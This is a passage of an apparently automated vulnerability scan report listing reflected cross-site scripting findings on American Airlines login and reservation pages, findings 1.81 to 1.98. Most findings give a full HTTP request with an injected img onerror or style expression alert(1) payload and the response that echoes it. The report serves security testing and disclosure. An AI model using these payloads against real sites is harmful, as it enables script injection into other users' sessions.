The value of the marketId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 973c4"><img%20src%3da%20onerror%3dalert(1)>f077b969550 was submitted in the marketId parameter. This input was echoed as 973c4"><img src=a onerror=alert(1)>f077b969550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.do&previousPage=%2fhomePage.do&bookingPathStateId=&marketId=973c4"><img%20src%3da%20onerror%3dalert(1)>f077b969550 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:44:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000M1k2EIse_-yYmdAlIjXbsAq:15mbfaj65; Path=/
Content-Length: 106719


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="marketId" value="973c4"><img src=a onerror=alert(1)>f077b969550" />
...[SNIP]...

1.81. https://www.aa.com/login/loginAccess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8f6"><img%20src%3da%20onerror%3dalert(1)>40023d6c144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea8f6"><img src=a onerror=alert(1)>40023d6c144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.do&previousPage=%2fhomePage.do&bookingPathStateId=&marketId=&ea8f6"><img%20src%3da%20onerror%3dalert(1)>40023d6c144=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:44:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000hbEreZAdXRWqs09Te4sg4aS:15mbfaj65; Path=/
Content-Length: 106643


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="ea8f6"><img src=a onerror=alert(1)>40023d6c144" value="1" />
...[SNIP]...

1.82. https://www.aa.com/login/loginAccess.do [previousPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

The value of the previousPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7bb2"><img%20src%3da%20onerror%3dalert(1)>d735257d1cc was submitted in the previousPage parameter. This input was echoed as b7bb2"><img src=a onerror=alert(1)>d735257d1cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.do&previousPage=%2fhomePage.dob7bb2"><img%20src%3da%20onerror%3dalert(1)>d735257d1cc&bookingPathStateId=&marketId= HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:43:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000N_gqpX1KOodvk1lZqRRBCIF:15mbfaj65; Path=/
Content-Length: 106719


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="previousPage" value="/homePage.dob7bb2"><img src=a onerror=alert(1)>d735257d1cc" />
...[SNIP]...

1.83. https://www.aa.com/login/loginAccess.do [uri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a62"><img%20src%3da%20onerror%3dalert(1)>0b6843de265 was submitted in the uri parameter. This input was echoed as f4a62"><img src=a onerror=alert(1)>0b6843de265 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.dof4a62"><img%20src%3da%20onerror%3dalert(1)>0b6843de265&previousPage=%2fhomePage.do&bookingPathStateId=&marketId= HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:43:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000LqDrEd5Q2yrR5D577FgUYSt:15mbfaj65; Path=/
Content-Length: 106707


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<form name="toggleLocaleForm" method="POST" action="/login/loginAccess.dof4a62"><img src=a onerror=alert(1)>0b6843de265">
...[SNIP]...

1.84. https://www.aa.com/reservation/awardFlightSearchAccess.do [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/awardFlightSearchAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83fe2"><img%20src%3da%20onerror%3dalert(1)>db4cd55bc9d was submitted in the anchorEvent parameter. This input was echoed as 83fe2"><img src=a onerror=alert(1)>db4cd55bc9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/awardFlightSearchAccess.do?anchorEvent=83fe2"><img%20src%3da%20onerror%3dalert(1)>db4cd55bc9d&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181860


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta http-e
...[SNIP]...
<input type="hidden" name="anchorEvent" value="83fe2"><img src=a onerror=alert(1)>db4cd55bc9d" />
...[SNIP]...

1.85. https://www.aa.com/reservation/awardFlightSearchAccess.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/awardFlightSearchAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeb3c"><img%20src%3da%20onerror%3dalert(1)>7fd1b9d349a was submitted in the from parameter. This input was echoed as eeb3c"><img src=a onerror=alert(1)>7fd1b9d349a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/awardFlightSearchAccess.do?anchorEvent=false&from=Naveeb3c"><img%20src%3da%20onerror%3dalert(1)>7fd1b9d349a HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181865


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta http-e
...[SNIP]...
<input type="hidden" name="from" value="Naveeb3c"><img src=a onerror=alert(1)>7fd1b9d349a" />
...[SNIP]...

1.86. https://www.aa.com/reservation/awardFlightSearchAccess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/awardFlightSearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7294"style%3d"x%3aexpression(alert(1))"c79ba24f5ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7294"style="x:expression(alert(1))"c79ba24f5ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /reservation/awardFlightSearchAccess.do?d7294"style%3d"x%3aexpression(alert(1))"c79ba24f5ff=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181803


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta http-e
...[SNIP]...
<input type="hidden" name="d7294"style="x:expression(alert(1))"c79ba24f5ff" value="1" />
...[SNIP]...

1.87. https://www.aa.com/reservation/flightCheckInViewReservationsAccess.do [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/flightCheckInViewReservationsAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7265d"><img%20src%3da%20onerror%3dalert(1)>547f75de32f was submitted in the anchorEvent parameter. This input was echoed as 7265d"><img src=a onerror=alert(1)>547f75de32f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/flightCheckInViewReservationsAccess.do?anchorEvent=7265d"><img%20src%3da%20onerror%3dalert(1)>547f75de32f&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118074


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->

...[SNIP]...
<input type="hidden" name="anchorEvent" value="7265d"><img src=a onerror=alert(1)>547f75de32f" />
...[SNIP]...

1.88. https://www.aa.com/reservation/flightCheckInViewReservationsAccess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/flightCheckInViewReservationsAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c216e"><img%20src%3da%20onerror%3dalert(1)>cd9ece75500 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c216e"><img src=a onerror=alert(1)>cd9ece75500 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/flightCheckInViewReservationsAccess.do?c216e"><img%20src%3da%20onerror%3dalert(1)>cd9ece75500=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118016


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->

...[SNIP]...
<input type="hidden" name="c216e"><img src=a onerror=alert(1)>cd9ece75500" value="1" />
...[SNIP]...

1.89. https://www.aa.com/reservation/multiCitySearchAccess.do [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/multiCitySearchAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 820bb"><img%20src%3da%20onerror%3dalert(1)>dd1dc3883cb was submitted in the anchorEvent parameter. This input was echoed as 820bb"><img src=a onerror=alert(1)>dd1dc3883cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/multiCitySearchAccess.do?anchorEvent=false820bb"><img%20src%3da%20onerror%3dalert(1)>dd1dc3883cb&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201367


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="anchorEvent" value="false820bb"><img src=a onerror=alert(1)>dd1dc3883cb" />
...[SNIP]...

1.90. https://www.aa.com/reservation/multiCitySearchAccess.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/multiCitySearchAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58ebd"><img%20src%3da%20onerror%3dalert(1)>55904bffdbc was submitted in the from parameter. This input was echoed as 58ebd"><img src=a onerror=alert(1)>55904bffdbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/multiCitySearchAccess.do?anchorEvent=false&from=58ebd"><img%20src%3da%20onerror%3dalert(1)>55904bffdbc HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201367


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="from" value="58ebd"><img src=a onerror=alert(1)>55904bffdbc" />
...[SNIP]...

1.91. https://www.aa.com/reservation/multiCitySearchAccess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/multiCitySearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f6cd"%20style%3dx%3aexpression(alert(1))%209010f253203 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f6cd" style=x:expression(alert(1)) 9010f253203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /reservation/multiCitySearchAccess.do?8f6cd"%20style%3dx%3aexpression(alert(1))%209010f253203=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201252


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="8f6cd" style=x:expression(alert(1)) 9010f253203" value="1" />
...[SNIP]...

1.92. https://www.aa.com/reservation/multiCitySearchAccess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/multiCitySearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51769"><img%20src%3da%20onerror%3dalert(1)>df722ff4cd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51769"><img src=a onerror=alert(1)>df722ff4cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/multiCitySearchAccess.do?anchorEvent=false&from=Nav&51769"><img%20src%3da%20onerror%3dalert(1)>df722ff4cd1=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201460


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="51769"><img src=a onerror=alert(1)>df722ff4cd1" value="1" />
...[SNIP]...

1.93. https://www.aa.com/reservation/oneWaySearchAccess.do [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/oneWaySearchAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d47"><img%20src%3da%20onerror%3dalert(1)>719355c5b62 was submitted in the anchorEvent parameter. This input was echoed as 94d47"><img src=a onerror=alert(1)>719355c5b62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/oneWaySearchAccess.do?anchorEvent=false94d47"><img%20src%3da%20onerror%3dalert(1)>719355c5b62&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 183261


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="anchorEvent" value="false94d47"><img src=a onerror=alert(1)>719355c5b62" />
...[SNIP]...

1.94. https://www.aa.com/reservation/oneWaySearchAccess.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/oneWaySearchAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2779d"><img%20src%3da%20onerror%3dalert(1)>23e8cd00570 was submitted in the from parameter. This input was echoed as 2779d"><img src=a onerror=alert(1)>23e8cd00570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/oneWaySearchAccess.do?anchorEvent=false&from=Nav2779d"><img%20src%3da%20onerror%3dalert(1)>23e8cd00570 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 183261


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="from" value="Nav2779d"><img src=a onerror=alert(1)>23e8cd00570" />
...[SNIP]...

1.95. https://www.aa.com/reservation/oneWaySearchAccess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/oneWaySearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef3c1"><img%20src%3da%20onerror%3dalert(1)>cb292cd9d2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef3c1"><img src=a onerror=alert(1)>cb292cd9d2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/oneWaySearchAccess.do?anchorEvent=false&from=Nav&ef3c1"><img%20src%3da%20onerror%3dalert(1)>cb292cd9d2a=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 183296


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="ef3c1"><img src=a onerror=alert(1)>cb292cd9d2a" value="1" />
...[SNIP]...

1.96. https://www.aa.com/reservation/reservationsHomeAccess.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/reservationsHomeAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8827"><img%20src%3da%20onerror%3dalert(1)>74594ef5718 was submitted in the from parameter. This input was echoed as e8827"><img src=a onerror=alert(1)>74594ef5718 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/reservationsHomeAccess.do?from=Nave8827"><img%20src%3da%20onerror%3dalert(1)>74594ef5718 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta
...[SNIP]...
<input type="hidden" name="from" value="Nave8827"><img src=a onerror=alert(1)>74594ef5718" />
...[SNIP]...

1.97. https://www.aa.com/reservation/reservationsHomeAccess.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/reservationsHomeAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f0f2"%20style%3dx%3aexpression(alert(1))%20a9075ebf15a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f0f2" style=x:expression(alert(1)) a9075ebf15a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /reservation/reservationsHomeAccess.do?5f0f2"%20style%3dx%3aexpression(alert(1))%20a9075ebf15a=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta
...[SNIP]...
<input type="hidden" name="5f0f2" style=x:expression(alert(1)) a9075ebf15a" value="1" />
...[SNIP]...

1.98. https://www.aa.com/reservation/roundTripSearchAccess.do [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcddd"><img%20src%3da%20onerror%3dalert(1)>3e7e2603db8 was submitted in the anchorEvent parameter. This input was echoed as fcddd"><img src=a onerror=alert(1)>3e7e2603db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/roundTripSearchAccess.do?anchorEvent=fcddd"><img%20src%3da%20onerror%3dalert(1)>3e7e2603db8&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
